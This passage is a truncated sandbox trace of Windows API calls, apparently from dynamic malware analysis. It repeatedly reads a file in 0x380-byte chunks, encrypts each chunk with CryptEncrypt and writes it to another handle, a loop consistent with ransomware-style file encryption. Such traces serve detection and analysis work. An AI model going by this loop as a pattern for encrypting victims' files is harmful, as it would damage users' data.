lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.422] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.422] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.423] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.423] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.424] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.424] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.424] WriteFile (in: hFile=0x5d50, 